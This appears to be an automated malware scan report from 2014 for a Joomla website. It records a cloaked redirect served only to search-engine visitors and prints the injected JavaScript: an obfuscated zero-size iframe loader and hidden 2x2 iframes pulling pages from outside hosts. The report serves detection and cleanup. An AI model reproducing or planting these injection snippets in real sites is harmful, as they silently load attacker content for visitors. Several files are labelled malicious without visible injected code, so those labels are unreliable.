Malicious/Suspicious Redirects
Request | Server response | Status |
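URL: http://egorsilin.com/ (request simulating a visitor arriving from a search engine, i.e. sent with a Google search Referer) GET / HTTP/1.1 Host: egorsilin.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 30 Aug 2014 11:49:20 GMT Location: http://alicebangkokescorts.com/wpbs.html?h=2663647 Server: nginx/1.6.0 Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: the same URL appears under "Scanned pages/files" with a 200 OK response and a clean status, which suggests the redirect is served only when the request carries a search-engine Referer; a check made by opening the address directly may therefore not show it.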
Scanned pages/files
Request | Server response | Status |
http://egorsilin.com/ | 200 OK Content-Length: 21321 Content-Type: text/html | clean |
http://egorsilin.com/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/x-javascript | clean |
http://egorsilin.com/components/com_k2/js/k2.js | 200 OK Content-Length: 12831 Content-Type: application/x-javascript | malicious |
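Malicious code - confirmed by antiviruses (see below). Note: the excerpt that follows is cut off mid-statement and shows only the component's comment-form submit handler; no injected code is visible in this part and the antivirus report cell for this file is empty, so the verdict should be checked against the full file or a known-good copy of the extension.
window.addEvent('domready', function(){ if($('comment-form')) { $('comment-form').addEvent('submit', function(e){ new Event(e).stop(); $('formLog').empty().addClass('formLogLoading'); this.send({ onComplete: function(res){ $('formLog').removeClass('formLogLoading').setHTML(res); if(typeof(Recaptcha) != "undefined"){ Recaptcha.reload(); } if (res.substr(13, 7) == 'success')
Antivirus reports: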
| ||
http://egorsilin.com/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 36572 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JCommentsEvents(){} function JCommentsInput(){} function JCommentsIndicator(){this.init();} function JCommentsForm(id,editor){this.init(id,editor);} function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);} function JComments(oi,og,r){this.init(oi,og,r);} JCommentsEvents.prototype = { add: function(o,e,f){if(o.addEventListener){o.addEventListener(e,f,false);return true;}else if(o.attachEvent){var r=o.attachEvent("on"+e,f);return r;}else{re Antivirus reports:
| ||
http://egorsilin.com/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 13732 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!window.jtajax) { function jtAJAX() { this.options = {url: '',type: 'post',nocache: true,data: ''}; this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;}; this.extend = function(o, e){for(var k in (e||{}))o[k]=e[k];return o;}; this.encode = function(t){return encodeURIComponent(t);}; this.setup = function(options) {this.options = this.extend(this.options, options);}; this Antivirus reports:
| ||
http://egorsilin.com/media/system/js/caption.js | 200 OK Content-Length: 2147 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The JCaption code at the start of the excerpt looks like the site's regular caption script; the injected part is the final document.write call, which writes a zero-size (width 0, height 0) iframe and assembles its URL from short string fragments, so the address never appears as a single literal in the file and a plain search for the host name would presumably miss it.
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://k'+'ar'+'na'+'yo.gr/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');
Antivirus reports:
| ||
http://egorsilin.com/modules/mod_gtranslate/jquery.js | 200 OK Content-Length: 67182 Content-Type: application/x-javascript | malicious |
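Malicious code - confirmed by antiviruses (see below). The injected statement is the document.write call that follows; it sits ahead of the minified jQuery library code and writes a 2x2 iframe whose source is on a different host from the scanned site.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331></iframe>');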
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://versaillesfamilymedicine.com/agbi.html?j=2034331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331> | ||
http://egorsilin.com/modules/mod_gtranslate/jquery-translate.js | 200 OK Content-Length: 25983 Content-Type: application/x-javascript | malicious |
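Malicious code - confirmed by antiviruses (see below). The injected statement is the document.write call that follows; it sits ahead of the file's own jQuery plugin code and writes a 2x2 iframe whose source is on a different host from the scanned site.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331></iframe>');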
jQuery.noConflict(); jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; i Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://versaillesfamilymedicine.com/agbi.html?j=2034331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331> | ||
http://egorsilin.com/components/com_imageshow/jscript/swfobject.js | 200 OK Content-Length: 19973 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= Antivirus reports:
| ||
http://egorsilin.com/administrator/components/com_imageshow/assets/js/jsn_ext_ultils.js | 200 OK Content-Length: 12759 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JSNExtUtils = { addEvent: function(target, event, func){ if (target.addEventListener){ target.addEventListener(event, func, false); return true; } else if (target.attachEvent){ var result = target.attachEvent("on"+event, func); return result; } else { return false; } }, checkSubstring: function(targetString, targetSubstring, delimeter, wholeWord){ if(wholeWord == undefined) wholeWord = false; var par Antivirus reports:
| ||
http://egorsilin.com/administrator/components/com_imageshow/assets/js/imageshow.js | 200 OK Content-Length: 51880 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JSNImageShow = { ChooseProfileFlickr:function(){ if($('select_configuration_available').checked == true){ $('source_type').disabled = false; $('flickr_api_key').disabled = true; $('flickr_secret_key').disabled = true; $('flickr_username').disabled = true; $('flickr_image_size').disabled = true; $('configuration_title').disabled = true; $('button').setStyle('display', 'none'); $('submit-form').setStyle('display', ''); } Antivirus reports:
| ||
http://egorsilin.com/index.php?option=com_phocagallery&view=categories&Itemid=48 | 200 OK Content-Length: 10162 Content-Type: text/html | clean |
http://egorsilin.com/index.php?option=com_content&view=article&id=51&Itemid=37 | 200 OK Content-Length: 13766 Content-Type: text/html | clean |
http://egorsilin.com/index.php?option=com_content&view=article&id=49&Itemid=50 | 200 OK Content-Length: 13198 Content-Type: text/html | clean |
http://egorsilin.com/index.php?view=article&id=49%3Aabout&format=pdf&option=com_content&Itemid=50 | 200 OK Content-Length: 242614 Content-Type: application/pdf | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=egorsilin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://egorsilin.com/
Result: egorsilin.com is not infected or malware details are not published yet.
Result: egorsilin.com is not infected or malware details are not published yet.